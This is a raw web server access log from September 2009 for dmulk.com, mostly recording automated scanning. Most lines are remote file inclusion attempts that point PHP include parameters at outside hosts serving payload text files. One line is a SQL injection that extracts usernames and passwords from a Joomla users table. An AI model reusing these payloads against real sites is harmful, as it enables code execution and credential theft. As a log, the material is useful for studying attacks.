219.85.63.226 - - [07/Sep/2009:10:02:14 -0700] "GET /logs/access_080808.log%20%20//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:15 -0700] "GET /system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:15 -0700] "GET /logs/access_080808.log%20%20//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:15 -0700] "GET /logs/access_090114.log%20%20//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:16 -0700] "GET /system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:16 -0700] "GET /logs//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:16 -0700] "GET /logs/access_090114.log%20%20//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:19 -0700] "GET /logs/access_080808.log%20%20//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:20 -0700] "GET /system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:20 -0700] "GET /logs/access_090114.log//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:20 -0700] "GET /logs//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:20 -0700] "GET /logs//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:21 -0700] "GET /logs//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:21 -0700] "GET /system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:21 -0700] "GET /logs/access_090114.log%20%20//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:24 -0700] "GET /logs//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:24 -0700] "GET /logs/access_080808.log//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:24 -0700] "GET /logs/access_090114.log//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:24 -0700] "GET /system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:25 -0700] "GET /system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:25 -0700] "GET /logs/access_080808.log//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:25 -0700] "GET /logs/access_090114.log//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:25 -0700] "GET /logs//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:26 -0700] "GET /logs/access_080808.log//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:26 -0700] "GET /logs/access_080808.log%20%20//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.139.209.74 - - [07/Sep/2009:10:02:29 -0700] "GET /logs/access_080525.log/index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:29 -0700] "GET /logs/access_080808.log//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.29.82.154 - - [07/Sep/2009:10:02:34 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.82.154 - - [07/Sep/2009:10:02:34 -0700] "GET /logs/access_080502.log//newspublish/include.php?path%5Bdocroot%5D=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.82.154 - - [07/Sep/2009:10:02:34 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:39 -0700] "GET /system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:39 -0700] "GET /logs//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:39 -0700] "GET /logs/access_080808.log//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:10:02:39 -0700] "GET /logs/access_090114.log//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.29.82.154 - - [07/Sep/2009:10:02:55 -0700] "GET /logs/access_080717.log//newspublish/include.php?path%5Bdocroot%5D=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.139.66.104 - - [07/Sep/2009:10:04:09 -0700] "GET /logs/access_090223.log%20%20//administrator/components/com_seyret/seyret.html.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:10:04:46 -0700] "GET /logs/access_090519.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.68.229 - - [07/Sep/2009:10:04:49 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_027.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:04:55 -0700] "GET /logs/access_080215.log%20%20/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:04:55 -0700] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:04:55 -0700] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:04:56 -0700] "GET /logs/access_080326.log%20%20/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:05:01 -0700] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:05:01 -0700] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:05:01 -0700] "GET /logs/access_080215.log%20%20/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:05:02 -0700] "GET /logs/access_080326.log%20%20/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:10:05:31 -0700] "GET /logs/access_080120.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:10:05:43 -0700] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:10:05:43 -0700] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:10:05:43 -0700] "GET /logs/access_080326.log%20%20/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.37.136.126 - - [07/Sep/2009:10:05:46 -0700] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.37.136.126 - - [07/Sep/2009:10:05:46 -0700] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.37.136.126 - - [07/Sep/2009:10:05:46 -0700] "GET /logs/access_080215.log%20%20/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.37.136.126 - - [07/Sep/2009:10:05:46 -0700] "GET /logs/access_080326.log%20%20/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:10:05:49 -0700] "GET /logs/access_080526.log%20%20/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.111.80.234 - - [07/Sep/2009:10:05:56 -0700] "GET /logs/access_080526.log////?_SERVER[DOCUMENT_ROOT]=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.111.80.234 - - [07/Sep/2009:10:05:56 -0700] "GET /logs/access_071228.log////?_SERVER[DOCUMENT_ROOT]=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:06:11 -0700] "GET /logs/access_080215.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:06:11 -0700] "GET /logs/access_080326.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:06:13 -0700] "GET /logs/access_080215.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:06:13 -0700] "GET /logs/access_080326.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [07/Sep/2009:10:06:14 -0700] "GET /logs/access_081207.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [07/Sep/2009:10:06:14 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 116211 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [07/Sep/2009:10:06:15 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 21355 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [07/Sep/2009:10:06:23 -0700] "GET /logs/access_090710.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:06:26 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:06:26 -0700] "GET /logs/access_080703.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:06:26 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [07/Sep/2009:10:06:34 -0700] "GET /logs/access_081207.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [07/Sep/2009:10:06:34 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 21355 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [07/Sep/2009:10:06:34 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 116211 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [07/Sep/2009:10:06:39 -0700] "GET /logs/access_090710.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:10:06:44 -0700] "GET /logs/access_080326.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:10:06:44 -0700] "GET /logs/access_080215.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:10:06:50 -0700] "GET /logs/access_090323.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:10:06:57 -0700] "GET /logs/access_081213.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [07/Sep/2009:10:07:10 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [07/Sep/2009:10:07:10 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [07/Sep/2009:10:07:10 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [07/Sep/2009:10:07:10 -0700] "GET /logs/access_080109.log//modules/TotalCalendar/about.php?inc_dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:10:07:12 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:10:07:12 -0700] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:10:07:12 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:10:07:18 -0700] "GET /logs/access_080107.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.37.136.126 - - [07/Sep/2009:10:07:22 -0700] "GET /logs/access_080215.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.37.136.126 - - [07/Sep/2009:10:07:22 -0700] "GET /logs/access_080326.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:10:07:28 -0700] "GET /logs/access_071224.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:10:07:53 -0700] "GET /logs/access_081211.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:07:55 -0700] "GET /logs/access_080703.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:07:57 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:07:57 -0700] "GET /logs/access_080703.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:07:57 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.57.78.8 - - [07/Sep/2009:10:07:59 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.57.78.8 - - [07/Sep/2009:10:07:59 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.57.78.8 - - [07/Sep/2009:10:08:00 -0700] "GET /logs/access_090408.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:10:08:14 -0700] "GET /logs/access_090517.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:10:08:20 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:10:08:20 -0700] "GET /logs/access_081012.log//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [07/Sep/2009:10:08:24 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
59.150.247.202 - - [07/Sep/2009:10:08:25 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 200 19784 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [07/Sep/2009:10:08:26 -0700] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [07/Sep/2009:10:08:26 -0700] "GET /logs/access_090703.log//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [07/Sep/2009:10:08:26 -0700] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:10:08:26 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
